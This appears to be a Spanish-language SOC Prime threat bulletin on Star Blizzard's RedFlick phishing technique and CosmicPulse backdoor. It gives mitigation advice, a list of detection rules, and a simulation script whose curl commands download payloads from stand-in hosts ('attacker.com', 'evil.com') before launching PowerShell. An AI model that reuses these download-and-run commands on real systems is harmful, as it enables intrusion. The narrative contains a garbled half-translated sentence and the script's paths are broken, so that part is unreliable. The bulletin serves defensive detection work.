SOC Prime Bias: Critical

01 Oct 2026 08:18 UTC

Star Blizzard utiliza RedFlick para mejorar el despliegue de phishing y malware

Author Photo
SOC Prime Team linkedin icon Seguir
Star Blizzard utiliza RedFlick para mejorar el despliegue de phishing y malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El actor patrocinado por el estado ruso Star Blizzard ha evolucionado su técnica utilizando la técnica RedFlick para entregar la puerta trasera CosmicPulse. El actor ha cambiado de un phishing altamente dirigido a campañas de phishing automatizadas a mayor escala utilizando sitios web comprometidos. Estas campañas utilizan métodos de entrega sofisticados, incluidos archivos VHDX y cargas útiles ocultas dentro de archivos PDF para evadir la detección.

Investigación

Microsoft Threat Intelligence analizó diversas oleadas de phishing observadas a lo largo de 2026, identificando una transición de cadenas basadas en ClickFix a tareas programadas RedFlick. La investigación detalló un flujo de ejecución en múltiples etapas que involucran archivos LNK, ejecución de comandos locales SSH y el uso de WebDAV para la recuperación remota de cargas útiles. El análisis técnico también descubrió el uso de esteganografía y cifrado basado en el registro para la carga útil de CosmicPulse.

Mitigación

Las organizaciones deberían implementar autenticación resistente al phishing y políticas de acceso condicional para asegurar las identidades. La protección de endpoints debe configurarse con EDR en modo de bloqueo y protección antivirus en tiempo real habilitada. Además, implementar reglas de reducción de superficies de ataque puede prevenir la ejecución de scripts ofuscados y archivos ejecutables no autorizados.

Respuesta

Tras la detección, los equipos de seguridad deben utilizar EDR para remediar artefactos maliciosos e investigar intentos de inicio de sesión sospechosos. Los modos de investigación y remediación automatizada deben estar habilitados para reducir los tiempos de respuesta. Las organizaciones también deberían usar soluciones avanzadas contra phishing y purga automática de hora cero para neutralizar comunicaciones maliciosas entrantes.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Línea de Comando Sospechosa Contiene Ruta UNC con Ejecutable como Argumento (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

Posible Descubrimiento de Recursos Compartidos de Red (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

Intentos Ocultos de Instalación Remota del Installer MsiExec Sospechoso (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

LOLBAS Conhost (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

Posible Uso de Herramienta de Tunelización [Windows] (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

Uso de CURL Sospechoso (vía línea de comandos)

Equipo de SOC Prime
30 Sep 2026

Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía DNS)

Equipo de SOC Prime
30 Sep 2026

IOC (HashSha256) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick

Reglas AI de SOC Prime
30 Sep 2026

IOC (SourceIP) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick

Reglas AI de SOC Prime
30 Sep 2026

IOC (DestinationIP) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick

Reglas AI de SOC Prime
30 Sep 2026

Detecta Ejecución de PowerShell desde Descarga de PDF [Windows Powershell]

Reglas AI de SOC Prime
30 Sep 2026

Detección de Técnica RedFlick de Star Blizzard – Tareas Programadas y Ejecución de Línea de Comando [Creación de Proceso de Windows]

Reglas AI de SOC Prime
30 Sep 2026

Ejecución de Simulación

  • Narrativa del Ataque y Comandos: El adversario entrega un correo electrónico de phishing que contiene un enlace a un archivo malicioso. Al interactuar, se desencadena una secuencia donde se utiliza para obtener una segunda etapa. Para integrarse con los procesos del sistema, el comando se diseña para incluir explícitamente los términos is utilized to fetch a secondary stage. To blend in with system processes, the command is crafted to explicitly include the terms PowerShell, PDF (referenciando la fuente del desencadenante), y conhost.exe en la cadena de línea de comando para coincidir con la lógica de la regla de detección del objetivo. El objetivo es ejecutar una carga útil decodificada incrustada dentro de una estructura PDF.

  • Script de Prueba de Regresión:

    # Script de simulación para activar la regla 'Detectar Ejecución de PowerShell desde Descarga de PDF'.
    # Este script construye una cadena de línea de comandos que incluye las cuatro palabras clave requeridas.
    
    $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF"
    $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}"
    
    # Ejecutamos a través de cmd para asegurar que conhost.exe sea parte del árbol de procesos/contexto de comandos
    Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`""
  • Comandos de Limpieza:

    # Limpiar archivos generados durante la simulación
    Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue
    Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue
    Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue